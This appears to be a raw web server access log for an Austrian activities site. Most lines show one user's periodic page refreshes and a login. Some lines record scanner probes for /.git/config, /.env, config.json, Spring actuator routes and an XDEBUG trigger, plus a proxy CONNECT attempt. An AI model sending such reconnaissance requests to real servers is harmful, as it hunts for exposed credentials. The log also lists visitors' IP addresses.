178.165.172.18 - - [31/Mar/2025:18:02:40 +0200] "GET /gui/javascript/form_form.js?1743436960 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=436900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:03:40 +0200] "GET /entry.php?id=10271&&ser=436960 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=436900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:03:41 +0200] "GET /gui/javascript/form_form.js?1743437021 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=436960" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:04:41 +0200] "GET /entry.php?id=10271&&ser=437021 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=436960" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:04:41 +0200] "GET /gui/javascript/form_form.js?1743437081 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437021" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
196.251.85.238 - - [31/Mar/2025:18:05:36 +0200] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
178.165.172.18 - - [31/Mar/2025:18:05:41 +0200] "GET /entry.php?id=10271&&ser=437081 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=437021" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:05:41 +0200] "GET /gui/javascript/form_form.js?1743437141 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437081" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:06:41 +0200] "GET /entry.php?id=10271&&ser=437141 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=437081" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:06:42 +0200] "GET /gui/javascript/form_form.js?1743437202 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
92.255.57.58 - - [31/Mar/2025:18:07:37 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.165.172.18 - - [31/Mar/2025:18:07:42 +0200] "GET /entry.php?id=10271&&ser=437202 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:07:42 +0200] "GET /gui/javascript/form_form.js?1743437262 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437202" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
195.211.191.127 - - [31/Mar/2025:18:07:44 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
178.165.172.18 - - [31/Mar/2025:18:08:42 +0200] "GET /entry.php?id=10271&&ser=437262 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437202" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:08:42 +0200] "GET /gui/javascript/form_form.js?1743437322 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437262" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:09:42 +0200] "GET /entry.php?id=10271&&ser=437322 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=437262" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:09:43 +0200] "GET /gui/javascript/form_form.js?1743437383 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437322" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:10:43 +0200] "GET /entry.php?id=10271&&ser=437383 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=437322" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:10:43 +0200] "GET /gui/javascript/form_form.js?1743437443 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437383" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:11:43 +0200] "GET /entry.php?id=10271&&ser=437443 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=437383" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:11:43 +0200] "GET /gui/javascript/form_form.js?1743437503 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:12:44 +0200] "GET /entry.php?id=10271&&ser=437503 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=437443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:12:44 +0200] "GET /gui/javascript/form_form.js?1743437564 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437503" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:13:44 +0200] "GET /entry.php?id=10271&&ser=437564 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437503" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:13:44 +0200] "GET /gui/javascript/form_form.js?1743437624 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437564" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:14:44 +0200] "GET /entry.php?id=10271&&ser=437624 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437564" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:14:44 +0200] "GET /gui/javascript/form_form.js?1743437684 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437624" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:15:44 +0200] "GET /entry.php?id=10271&&ser=437684 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437624" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:15:45 +0200] "GET /gui/javascript/form_form.js?1743437745 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437684" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:16:45 +0200] "GET /entry.php?id=10271&&ser=437745 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437684" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:16:45 +0200] "GET /gui/javascript/form_form.js?1743437805 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437745" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:17:45 +0200] "GET /entry.php?id=10271&&ser=437805 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437745" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:17:45 +0200] "GET /gui/javascript/form_form.js?1743437865 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437805" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:18:46 +0200] "GET /entry.php?id=10271&&ser=437865 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437805" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:18:46 +0200] "GET /gui/javascript/form_form.js?1743437926 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437865" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:19:46 +0200] "GET /entry.php?id=10271&&ser=437926 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437865" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:19:46 +0200] "GET /gui/javascript/form_form.js?1743437986 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437926" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:20:46 +0200] "GET /entry.php?id=10271&&ser=437986 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437926" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:20:46 +0200] "GET /gui/javascript/form_form.js?1743438046 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=437986" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:21:47 +0200] "GET /entry.php?id=10271&&ser=438046 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=437986" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:21:47 +0200] "GET /gui/javascript/form_form.js?1743438107 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438046" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:22:47 +0200] "GET /entry.php?id=10271&&ser=438107 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438046" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:22:47 +0200] "GET /gui/javascript/form_form.js?1743438167 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438107" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:23:47 +0200] "GET /entry.php?id=10271&&ser=438167 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438107" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:23:47 +0200] "GET /gui/javascript/form_form.js?1743438227 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438167" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:24:48 +0200] "GET /entry.php?id=10271&&ser=438227 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438167" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:24:48 +0200] "GET /gui/javascript/form_form.js?1743438288 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438227" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
204.76.203.15 - - [31/Mar/2025:18:25:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.165.172.18 - - [31/Mar/2025:18:25:48 +0200] "GET /entry.php?id=10271&&ser=438288 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438227" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:25:48 +0200] "GET /gui/javascript/form_form.js?1743438348 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438288" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:26:48 +0200] "GET /entry.php?id=10271&&ser=438348 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438288" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:26:48 +0200] "GET /gui/javascript/form_form.js?1743438408 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438348" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:27:48 +0200] "GET /entry.php?id=10271&&ser=438408 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438348" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:27:49 +0200] "GET /gui/javascript/form_form.js?1743438469 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438408" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:28:49 +0200] "GET /entry.php?id=10271&&ser=438469 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438408" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:28:49 +0200] "GET /gui/javascript/form_form.js?1743438529 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438469" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:29:49 +0200] "GET /entry.php?id=10271&&ser=438529 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438469" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:29:49 +0200] "GET /gui/javascript/form_form.js?1743438589 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438529" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
164.52.24.188 - - [31/Mar/2025:18:30:38 +0200] "\x16\x03\x01\x02" 400 383 "-" "-"
178.165.172.18 - - [31/Mar/2025:18:30:50 +0200] "GET /entry.php?id=10271&&ser=438589 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=438529" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:30:50 +0200] "GET /gui/javascript/form_form.js?1743438650 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=438589" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
164.52.24.188 - - [31/Mar/2025:18:30:54 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
178.165.172.18 - - [31/Mar/2025:18:31:47 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1880 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:31:47 +0200] "GET /gui/javascript/form_form.js?1743438707 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:31:49 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2434 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:31:49 +0200] "GET /gui/javascript/form_form.js?1743438709 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:31:49 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 907 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
178.165.172.18 - - [31/Mar/2025:18:31:49 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1913 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
94.181.156.210 - - [31/Mar/2025:18:47:31 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.136 - - [31/Mar/2025:18:52:31 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12066863.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Mar/2025:18:58:16 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10533264.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.85.250 - - [31/Mar/2025:18:59:44 +0200] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
154.81.156.35 - - [31/Mar/2025:19:07:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.255.57.58 - - [31/Mar/2025:19:09:56 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
129.126.117.32 - - [31/Mar/2025:19:15:04 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
129.126.117.32 - - [31/Mar/2025:19:15:25 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
84.145.157.51 - - [31/Mar/2025:19:22:40 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
156.59.198.136 - - [31/Mar/2025:19:25:32 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11582027.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.10 - - [31/Mar/2025:19:29:14 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
43.153.54.14 - - [31/Mar/2025:19:31:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
151.106.162.202 - - [31/Mar/2025:19:36:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6512c09a34f03757e00d21241012d9c6 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [31/Mar/2025:19:36:19 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6512c09a34f03757e00d21241012d9c6 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [31/Mar/2025:19:36:19 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6512c09a34f03757e00d21241012d9c6 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
115.231.78.11 - - [31/Mar/2025:19:38:31 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36"
115.231.78.11 - - [31/Mar/2025:19:38:32 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
115.231.78.11 - - [31/Mar/2025:19:38:32 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
185.91.127.81 - - [31/Mar/2025:19:42:43 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0"
92.255.57.58 - - [31/Mar/2025:19:45:18 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
156.59.198.136 - - [31/Mar/2025:19:49:51 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961394.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.85.74 - - [31/Mar/2025:20:02:51 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
196.251.85.74 - - [31/Mar/2025:20:02:51 +0200] "GET /wp-content/ HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
57.129.64.237 - - [31/Mar/2025:20:04:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
180.163.220.43 - - [31/Mar/2025:20:11:54 +0200] "\x16\x03\x01\x018\x01" 400 383 "-" "-"
180.163.220.51 - - [31/Mar/2025:20:11:55 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
180.163.220.52 - - [31/Mar/2025:20:12:02 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
180.163.220.99 - - [31/Mar/2025:20:12:08 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
180.163.220.46 - - [31/Mar/2025:20:12:13 +0200] "GET /sitemap.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
180.163.220.125 - - [31/Mar/2025:20:12:17 +0200] "GET /config.json HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
156.59.198.135 - - [31/Mar/2025:20:19:46 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961274.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.71.106 - - [31/Mar/2025:20:23:10 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (iPod touch; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML like Gecko) Version/7.0 Mobile/11D167 Safari/123E71C"
49.213.188.133 - - [31/Mar/2025:20:32:12 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
211.23.120.26 - - [31/Mar/2025:20:43:42 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
154.81.156.35 - - [31/Mar/2025:20:55:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [31/Mar/2025:20:57:12 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11549098.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.10 - - [31/Mar/2025:21:02:09 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
103.43.7.29 - - [31/Mar/2025:21:14:04 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
179.43.186.225 - - [31/Mar/2025:21:32:35 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 292 "-" "Mozilla/5.0 (SS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
185.242.226.116 - - [31/Mar/2025:21:38:38 +0200] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [31/Mar/2025:21:44:05 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12299685.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
